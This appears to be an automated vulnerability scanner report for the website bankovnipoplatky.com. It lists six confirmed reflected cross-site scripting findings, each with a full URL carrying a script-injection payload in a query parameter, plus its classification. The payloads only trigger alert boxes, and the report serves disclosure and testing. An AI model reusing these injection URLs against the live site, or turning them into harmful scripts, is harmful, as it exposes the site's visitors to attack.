bankovnipoplatky.com

1. XSS (Cross-site Scripting)
2.  
3. Severity: Important
4. Confirmation: Confirmed
5. URL: http://www.bankovnipoplatky.com/index.php?event='"--></style></script><script>alert(0x0006BB)</script>&bid=13
6. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
7. Parameter Name: event
8. Parameter Type: Querystring
9. Attack Pattern: '"--></style></script><script>alert(0x0006BB)</script>
10.  
11. Severity: Important
12. Confirmation: Confirmed
13. URL: http://www.bankovnipoplatky.com/?e='"--></style></script><script>alert(0x00073B)</script>&anketa=4&odpoved=1
14. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
15. Parameter Name: e
16. Parameter Type: Querystring
17. Attack Pattern: '"--></style></script><script>alert(0x00073B)</script>
18.  
19. Severity: Important
20. Confirmation: Confirmed
21. URL: http://www.bankovnipoplatky.com/pobocky-bank.html?v='"--></style></script><script>alert(0x000DC8)</script>
22. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
23. Parameter Name: v
24. Parameter Type: Querystring
25. Attack Pattern: '"--></style></script><script>alert(0x000DC8)</script>
26.  
27. Severity: Important
28. Confirmation: Confirmed
29. URL: http://www.bankovnipoplatky.com/?e='"--></style></script><script>alert(0x000FA7)</script>
30. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
31. Parameter Name: e
32. Parameter Type: Querystring
33. Attack Pattern: '"--></style></script><script>alert(0x000FA7)</script>
34.  
35. Severity: Important
36. Confirmation: Confirmed
37. URL: http://www.bankovnipoplatky.com/?e='"--></style></script><script>alert(0x000FC2)</script>
38. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
39. Parameter Name: e
40. Parameter Type: Querystring
41. Attack Pattern: '"--></style></script><script>alert(0x000FC2)</script>
42.  
43. Severity: Important
44. Confirmation: Confirmed
45. URL: http://www.bankovnipoplatky.com/index.php?event='"--></style></script><script>alert(0x00121E)</script>&img=http://www.bankovnipoplatky.com/files/pages/47-kontakty-html/nacher-jpg.jpg&w=124&h=82
46. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
47. Parameter Name: event
48. Parameter Type: Querystring
49. Attack Pattern: '"--></style></script><script>alert(0x00121E)</script>
50.  
51. //